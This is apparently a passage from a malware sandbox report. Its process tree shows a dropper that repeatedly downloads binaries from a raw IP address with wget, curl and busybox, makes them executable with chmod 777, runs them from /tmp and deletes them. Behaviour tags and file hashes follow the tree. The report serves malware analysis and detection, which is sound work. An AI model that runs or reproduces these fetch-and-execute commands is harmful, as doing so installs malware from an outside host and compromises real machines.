/usr/bin/curlcurl -O http://87.120.126.196/bins/gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH72⤵PID:962
-
-
/bin/chmodchmod 777 gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH72⤵
- File and Directory Permissions Modification
PID:963
-
-
/tmp/gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH7./gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH72⤵
- Executes dropped EXE
PID:964
-
-
/bin/rmrm gNDLcu6twOiHBhJU7mmXM6OZssNtSFOIH72⤵PID:965
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln2⤵PID:966
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:967
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln2⤵PID:968
-
-
/bin/chmodchmod 777 DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln2⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln./DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln2⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm DdHBtJMNYjRrgcNgqyj0Qzuwbob6GLAzln2⤵PID:971
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N2⤵PID:972
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N2⤵PID:974
-
-
/bin/chmodchmod 777 O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N2⤵
- File and Directory Permissions Modification
PID:975
-
-
/tmp/O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N./O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N2⤵
- Executes dropped EXE
PID:976
-
-
/bin/rmrm O3QMGrtludoGhCVpOk7RvuMp28gsKtzS0N2⤵PID:977
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC2⤵PID:978
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:979
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC2⤵PID:980
-
-
/bin/chmodchmod 777 QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC2⤵
- File and Directory Permissions Modification
PID:981
-
-
/tmp/QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC./QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC2⤵
- Executes dropped EXE
PID:982
-
-
/bin/rmrm QKupOA0pVV0dBSmVcznYjxHmdE5tt4gZiC2⤵PID:983
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N2⤵PID:984
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:985
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N2⤵PID:986
-
-
/bin/chmodchmod 777 a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N2⤵
- File and Directory Permissions Modification
PID:987
-
-
/tmp/a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N./a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N2⤵
- Executes dropped EXE
PID:988
-
-
/bin/rmrm a6pFSFjTV0vJBMsePn6ItEOyn0lcIh2e3N2⤵PID:989
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX2⤵PID:990
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:991
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX2⤵PID:992
-
-
/bin/chmodchmod 777 zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX2⤵
- File and Directory Permissions Modification
PID:993
-
-
/tmp/zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX./zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX2⤵
- Executes dropped EXE
PID:994
-
-
/bin/rmrm zd9CIENUdnvUomXolPpH0gOdJL77iH3PvX2⤵PID:995
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LgAgf8NoanLiVkquiNwJ0eVwi7tgq6Yojq2⤵PID:996
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LgAgf8NoanLiVkquiNwJ0eVwi7tgq6Yojq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:997
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LgAgf8NoanLiVkquiNwJ0eVwi7tgq6Yojq2⤵PID:998
-
-
/bin/chmodchmod 777 LgAgf8NoanLiVkquiNwJ0eVwi7tgq6Yojq2⤵
- File and Directory Permissions Modification
PID:999
-
-
/tmp/LgAgf8NoanLiVkquiNwJ0eVwi7tgq6Yojq./LgAgf8NoanLiVkquiNwJ0eVwi7tgq6Yojq2⤵
- Executes dropped EXE
PID:1000
-
-
/bin/rmrm LgAgf8NoanLiVkquiNwJ0eVwi7tgq6Yojq2⤵PID:1001
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97